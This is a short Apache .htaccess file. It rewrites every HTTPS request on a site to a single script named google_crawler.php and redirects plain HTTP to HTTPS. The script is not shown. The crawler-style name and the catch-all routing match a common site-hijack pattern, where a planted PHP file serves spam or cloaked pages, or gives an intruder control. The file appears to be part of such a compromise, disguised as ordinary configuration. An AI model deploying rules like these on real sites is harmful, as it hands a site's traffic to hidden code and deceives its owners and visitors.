RewriteEngine On
RewriteCond %{HTTPS} on
RewriteRule ^(.*)$ google_crawler.php [L]

RewriteCond %{HTTPS} off
RewriteCond %{HTTP:X-Forwarded-Proto} !https
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]